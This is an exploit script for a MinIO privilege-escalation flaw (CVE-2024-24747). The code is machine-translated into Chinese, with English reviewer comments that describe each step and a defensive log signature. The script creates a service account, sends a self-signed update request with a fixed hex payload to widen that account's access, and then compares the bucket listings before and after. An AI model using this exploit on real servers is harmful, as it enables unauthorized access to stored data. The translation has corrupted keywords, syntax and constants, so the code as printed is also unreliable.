
Minio 2024-01-31T20-20-20-33Z-特权升级

#利用标题: Minio 2024-01-31T20-20-20-33Z-特权升级
#日期: 2024-04-11
#利用作者: Jenson Zhao
#供应商HomePage: https://min.io/
#软件link: https://github.com/minio/minio/
#版本: 早于(不含)2024-01-31T20-20-20-33Z 的所有版本
#测试在: Windows 10
#CVE : CVE-2024-24747
#在执行之前要求: PIP安装Minio,请求
导入argparse
导入日期
导入追踪
导入Urllib
来自xml.dom.minidom导入parsestring
导入请求
进口JSON
导入基础64
从minio.credentials导入凭据
来自minio.signer导入sign_v4_s3
# NOTE(review): this copy of the script went through machine translation together
# with the page text: keywords, identifiers, operators and several string and hex
# literals are altered and indentation is lost, so it is not valid Python as
# printed. Code lines are kept exactly as published; only comments are added.
#
# Purpose, as far as the surviving calls show: a self-contained check for the CVE
# named in the page header. Using operator-supplied keys it creates two test
# buckets and a temporary service account, lists the buckets that account can
# see, sends one update-service-account request signed by that same account,
# lists again, compares the two listings, and finally removes what it created.
# Defensive reading: the event of interest in server audit logs is an
# update-service-account call whose signer and target access key are identical.
CVE_2024_24747:类
new_buckets=[]
old_buckets=[]
# Constructor: stores the connection settings and then runs the entire check.
# - `verify` is filled from the --https switch by the caller; here it only picks
#   the URL scheme, it is not a certificate-verification setting.
# - The temporary service account uses a fixed key and an identical fixed secret.
#   If the cleanup calls at the end fail, an account with a publicly known secret
#   remains on the server, so its removal should be confirmed after any run.
def __init __(self,host,port,console_port,accesskey,secretkey,verify=false):
self.bucket_names=['pocpublic','pocprivate']
self.new_accesskey='miniocvepoc'
self.new_secretkey='miniocvepoc'
self.headers={
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)
'content-type':'应用程序/json',
'Accept':'/'
}
self.accesskey=accessKey
self.secretkey=SecretKey
self.verify=验证
如果验证:
self.url='https://' +主机+':' +端口
self.console_url='https://' +主机+':' + console_port
其他:
self.url='http://' +主机+':' +端口
self.console_url='http://' +主机+':' + console_port
# Credentials of the temporary service account; headers_gen signs with these.
# NOTE(review): the closing parenthesis of this call is missing in this copy.
self.credits=凭据(
access_key=self.new_accesskey,
secret_key=self.new_secretkey

self.login()
# NOTE(review): the handler below catches every exception and prints a call
# stack rather than the exception itself (presumably traceback.print_stack),
# so a failed step is easy to miss. The cleanup that follows always runs.
TRY:
self.create_buckets()
self.create_accesskey()
self.old_buckets=self.console_ls()
self.console_exp()
self.new_buckets=self.console_ls()
Except:
trackback.print_stack()
最后:
self.delete_accesskey()
self.delete_buckets()
# NOTE(review): the comparison operator between the two len() calls is missing
# in this copy; the messages suggest the test is "more buckets visible after the
# update than before" - confirm against the original source.
如果len(self.new_buckets)len(self.old_buckets):
打印(“ CVE-2024-24747有Minio的问题!')
print('漏洞之前,存储桶为:' + str(self.old_buckets))
打印('漏洞后,水桶为:' + str(self.new_buckets))
其他:
打印('Minio没有CVE-2024-24747问题!')
# Opens a requests session and posts the operator's keys to /api/v1/login on
# self.url; HTTP 204 is treated as success, anything else prints a message and
# exits with status 1.
# NOTE(review): when the https switch is set, the session's certificate
# verification is turned off, so the keys are sent to a server whose identity is
# not checked. Pointing verification at a trusted CA bundle would avoid that.
# The `status_code=0` assignments here and in the methods below are never read.
def登录(自我):
url=self.url +'/api/v1/login'
有效载荷=json.dumps({
'AccessKey': self.Accesskey,
'SecretKey': self.secretkey
}))
self.session=requests.session()
如果self.verify:
self.session.verify=false
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
打印(“登录失败!请检查输入AccessKey和SecretKey是否正确!”)
出口(1)
# Creates each bucket in self.bucket_names through /api/v1/buckets using the
# logged-in session, with versioning and locking off. HTTP 200 is success; a
# failure is only printed and the loop continues.
def create_buckets(self):
url=self.url +'/api/v1/buckets'
为self.bucket_names:中的名称
有效载荷=json.dumps({
'name':名称,
'versioning': false,
'locking': false
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==200:
status_code=0
其他:
打印('new(new)'+名称+'桶失败(失败)!')
# Cleanup: deletes each test bucket through /api/v1/buckets/<name>. HTTP 204 is
# success; a failure is only printed, so leftovers have to be checked by hand.
Def Delete_buckets(self):
为self.bucket_names:中的名称
url=self.url +'/api/v1/buckets/' +名称
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
status_code=0
其他:
print('delete(delete)'+名称+'桶失败(失败)!')
# Creates the temporary service account through
# /api/v1/service-account-credentials with an inline policy and the fixed
# key/secret pair. HTTP 201 is success.
# NOTE(review): the policy string is corrupted in this copy; the surviving
# fragment mentions only the pocpublic bucket, which would match a policy scoped
# to one of the two test buckets - confirm against the original source.
def create_accesskey(self):
url=self.url +'/api/v1/service-account-credentials'
有效载荷=json.dumps({
'polity':'{\ n \'版本\': \'2012-10-17 \',\ n \'语句\': [\ n {\ n {\ n \'feastr \': \': \ ],\ n \'resource \': [\ n \'arn:AWS:S33333333333333333333333333:pocpublic \',\ n \ n \'arn33:AW } \ n] \ n}',
'accessKey': self.new_accesskey,
'SecretKey': self.new_secretkey
}))
status_code=self.session.request('post',url,headers=self.headers,data=有效载荷).status_code
#print(status_code)
如果status_code==201:
#print('new(new)' + self.new_accesskey +'AccessKey Success(Success)!')
#print(self.new_secretkey)
status_code=0
其他:
print('new(new)' + self.new_accesskey +'accessKey失败(失败)!')
# Cleanup: deletes the temporary service account; the access key is base64
# encoded into the URL path. HTTP 204 is success, failure is only printed.
DEF DELETE_ACCESSKEY(self):
url=self.url +'/api/v1/service-accounts/' + base64.b64encode(self.new_accesskey.encode('utf-8''))。解码('utf-8')
status_code=self.session.request('delete',url,headers=self.headers).status_code
#print(status_code)
如果status_code==204:
#print('delete' + self.new_accesskey +'AccessKey succeeded!')
status_code=0
其他:
print('delete(delete)' + self.new_accesskey +'accessKey失败(失败)!')
# Builds signed request headers for `url`: a content hash header, a UTC
# timestamp header and the host, then passes them to sign_v4_s3 with region
# 'us-east-1' and the temporary service account's credentials (self.credits).
# Returns the signed header mapping.
# NOTE(review): the closing parenthesis of the sign_v4_s3 call is missing in
# this copy, and the strftime format letters have been case-folded.
def headers_gen(self,url,sha256,方法):
dateTimes=dateTime.dateTime.utcnow()
datetime_str=datetimes.strftime('%y%m%dt%h%m%sz')
urls=urllib.parse.urlparse(url)
标题={
'X-AMZ-CONTENT-SHA256': SHA256,
'x-amz-date': datetime_str,
'host': urls.netloc,
}
标题=sign_v4_s3(
方法=方法,
url=url,
区域='us-east-1',
标题=标题,
凭据=self.credits,
content_sha256=sha256,
date=datetimes,

返回标题
# Lists the buckets visible to the temporary service account: a signed GET of
# '/' on self.console_url, whose XML reply is parsed for the name inside each
# bucket element. Returns the list of names.
# The hash constant is the SHA-256 of an empty body, as used for a GET.
# NOTE(review): the reply is parsed with xml.dom.minidom, which is not hardened
# against hostile XML; that matters if the script is pointed at an untrusted host.
def console_ls(self):
url=self.console_url +'/'
SHA256='E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855'
headers=self.headers_gen(url,sha256,'get')
如果self.verify:
响应=requests.get(url,headers=标题,验证=false)
其他:
响应=requests.get(url,标头=标题)
domtree=parsestring(wendesp.text)
集合=Domtree.DocumentElement
buckets=collection.getElementsbytagname('bucket')
bucket_names=[]
对于桶中的桶:
bucket_names.append(bucket.getElementsbytagname('name')[0] .childnodes [0] .data)
#print('Buckets currently visible: \ n' + str(bucket_names))
返回bucket_names
# The step under test: a signed POST to
# /minio/admin/v3/update-service-account?accessKey=<temporary key> on
# self.console_url, signed by that same temporary account, carrying a fixed
# opaque body decoded from hex. HTTP 204 means the server accepted the update.
# NOTE(review): presumably a fixed server refuses this request; the two listings
# taken around this call are what the constructor compares.
# NOTE(review): the hex constants in this copy may have been altered by the same
# extraction that damaged the rest of the listing; treat them as unreliable.
# Certificate verification is disabled on the https path here as well.
def console_exp(self):
url=self.console_url +'/minio/admin/v3/update-service-account?accessKey=' + self.new_accesskey
SHA256='0F87FD59DFF29507F82E189D4F493206EA7F370D0CE97B9CC8C1B1B7A4E609EC95'
标题=self.headers_gen(url,sha256,'post')
hex_string='e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336'
content=bytes.fromhex(hex_string)
如果self.verify:
响应=requests.post(url,headers=标题,data=content,verify=false)
其他:
响应=requests.post(url,headers=标题,data=content)
status_code=reverse.status_code
如果status_code==204:
#print('Elevating ' + self.new_accesskey +' permissions succeeded!')
status_code=0
其他:
print('propart)' + self.new_accesskey +'权限失败!')
# Script entry point: prints a banner, parses the command line and runs the whole
# check by constructing CVE_2024_24747 (all of the work happens in its constructor).
# NOTE(review): the access key and secret key are taken from the command line, so
# they end up in shell history and process listings on the machine running this.
# NOTE(review): the https switch only selects https:// URLs; inside the class it
# also turns certificate verification off, so it adds no assurance about which
# server receives the keys.
# NOTE(review): option spellings and keyword names below were altered by the
# page's machine translation and are kept as published.
如果name=='__ -Main __':
徽标='''
__ __ _ _____ _ _____ _ ______ _ ______
_ __ __ | _ \/_ \ | _ \ | || | _ \ | || | __ || | _ || || | _ |
/__ | \ \ \//_ \ ______ )|| | | | | | )|| || | _ ___)|| || || | _//| || | _///
| (__ \ V/| /|_____|//| |_| |//|_ ||____ |//| |//|_ _|//
\ _ | \ /\ _ | | ______ | \ /| _ | | _____ | | _____ | | _ |//| _ | //
'''
打印(徽标)
Parser=argparse.argumentparser()
parser.add_argument(' - h',' - horst',必需=true,help='target的主机。示例: 127.0.0.0.1')
parser.add_argument(' - a',' - accesskey',必需=true,help='目标的minio AccessKey。示例: miniioadmin')
parser.add_argument(' - s',' - secretkey',必需=true,help='目标的minio secretkey。示例: miniioadmin')
parser.add_argument(' - c',' - console_port',必需=true,help='目标的minio控制台端口。示例: 9000')
parser.add_argument(' - p',' - port',必需=true,help='目标的minio端口。示例: 9090')
parser.add_argument(' - https',action='store_true',help='是通过https访问的。')
args=parser.parse_args()
CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)
 